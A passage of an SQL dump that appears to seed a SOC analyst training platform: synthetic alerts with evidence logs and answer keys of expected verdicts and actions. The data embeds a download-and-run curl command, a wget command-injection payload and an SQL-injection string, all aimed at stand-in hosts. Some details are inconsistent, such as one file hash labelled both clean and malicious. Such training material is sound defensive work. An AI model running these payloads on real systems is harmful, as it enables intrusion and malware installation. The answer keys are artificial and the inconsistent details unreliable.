'{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1299, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Using harvested credentials, the attackers conducted reconnaissance to map the network and identify high-value targets for data exfiltration. The operation involved suspicious SMB traffic from an internal IP to multiple endpoints in the network.', 'Internal Reconnaissance', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T02:45:27Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":[\"192.168.1.20\",\"192.168.1.25\",\"192.168.1.30\"],\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"username\":\"j.doe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"recon_tool.exe\",\"action\":\"Successful authentication using SMB protocol\",\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"suspicious_hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-02-24 03:16:14', '2026-02-24 15:34:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address known for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious tool.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user whose credentials were likely 
compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"recon_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used for internal reconnaissance.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1300, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'An unauthorized attempt to exfiltrate sensitive documents and communications was detected. The attackers leveraged encrypted channels to avoid detection. The attempt involved the transfer of files to an external server.', 'Data Theft', 'T1048: Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-2023-9876\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"confidential_report.docx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"action\":\"Blocked\",\"description\":\"Sensitive file transfer attempt to external IP using encrypted channel.\"}', '2026-02-24 03:16:14', '2026-02-24 15:34:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host attempting exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_service\",\"verdict\":\"malicious\",\"details\":\"External IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"dlp_system\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document flagged for unauthorized transfer attempt.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_lookup_service\",\"verdict\":\"clean\",\"details\":\"File hash matches known clean file but flagged due to 
context.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.763Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-2023-9876\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_report.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Blocked\\\",\\\"description\\\":\\\"Sensitive file transfer attempt to external IP using encrypted channel.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1301, 'Connection to Russian Services Analyzed', 'high', 'Threat Intelligence Reports', 'The analysis identified the use of known Gamaredon TTPs and infrastructure, indicative of potential connections to Russian security services. Specific indicators include IP addresses, file hashes, and domains linked to malicious activity.', 'Attribution Analysis', 'TTPs and Infrastructure Analysis', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-16T14:23:45Z\",\"source_ip\":\"185.165.123.45\",\"destination_ip\":\"10.0.5.23\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"domain\":\"malicious-russian-service.ru\",\"username\":\"compromised_user\",\"filename\":\"gamaredon_payload.exe\",\"action\":\"detected\",\"outcome\":\"success\"}', '2026-02-24 03:16:14', '2026-02-24 15:35:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.165.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Gamaredon APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Gamaredon malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-russian-service.ru\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Domain used in previous Gamaredon attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"gamaredon_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"APT Artifact Database\",\"verdict\":\"malicious\",\"details\":\"Filename pattern commonly used by Gamaredon 
group.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account suspected of being compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T14:23:45Z\\\",\\\"source_ip\\\":\\\"185.165.123.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"domain\\\":\\\"malicious-russian-service.ru\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"gamaredon_payload.exe\\\",\\\"action\\\":\\\"detected\\\",\\\"outcome\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1302, 'Unauthorized Access Attempt to S3 Bucket', 'high', 'AWS GuardDuty', 'Multiple failed login attempts detected on S3 bucket with credentials from an unusual IP address.', 'Credential Attack', 'T1110', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T03:15:32Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.5\",\"username\":\"john.doe\",\"hostname\":\"s3-bucket-server\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-27 06:50:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common internal username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated failed login attempts from a malicious IP indicate a likely credential brute force attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed 
password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.765Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:15:32Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3-bucket-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1303, 'Suspicious Process Execution on Kubernetes Node', 'critical', 'Prisma Cloud', 'A suspicious command was executed on a Kubernetes node, potentially indicating exploitation of vulnerabilities.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T06:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.8\",\"username\":\"kube-admin\",\"hostname\":\"k8s-node-02\",\"request_body\":null,\"command_line\":\"curl -fsSL http://malicious-site.com/install.sh | sh\"}', '2026-02-24 03:24:16', '2026-02-27 06:49:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP linked to known malware distribution site\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl -fsSL http://malicious-site.com/install.sh | sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with downloading and executing malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of curl to download and execute a script from a known malicious site is indicative of a malware infection attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL 
http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.766Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:45:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"kube-admin\\\",\\\"hostname\\\":\\\"k8s-node-02\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"curl -fsSL http://malicious-site.com/install.sh | sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1304, 'Phishing Email Containing Malicious URL', 'medium', 'Proofpoint', 'An email was received from a spoofed domain containing a URL leading to a phishing site.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T01:22:47Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":null,\"username\":\"alice@example.com\",\"hostname\":null,\"request_body\":null,\"command_line\":null,\"email_sender\":\"noreply@secure-login.com\",\"url\":\"http://phishing-site.com/login\"}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@secure-login.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain appears similar to legitimate site\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known phishing URL in an email from a spoofed domain confirms this as a phishing attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Containing Malicious URL\",\"date\":\"2026-02-24T04:22:04.767Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1305, 'Detected Command Injection on Public Web Server', 'critical', 'Wiz', 'A command injection attempt was detected on a public-facing web server, potentially compromising the server\'s integrity.', 'Web Attack', 'T1190', 1, 'investigating', 109, '{\"timestamp\":\"2026-02-24T04:12:55Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.56\",\"dst_ip\":\"192.168.2.5\",\"username\":null,\"hostname\":\"web-server-01\",\"request_body\":\"id; wget http://malicious-site.com/backdoor.sh\",\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-26 14:03:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple web application attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id; wget http://malicious-site.com/backdoor.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt to download and execute a backdoor\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a command injection payload targeting a known vulnerable endpoint confirms malicious intent.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 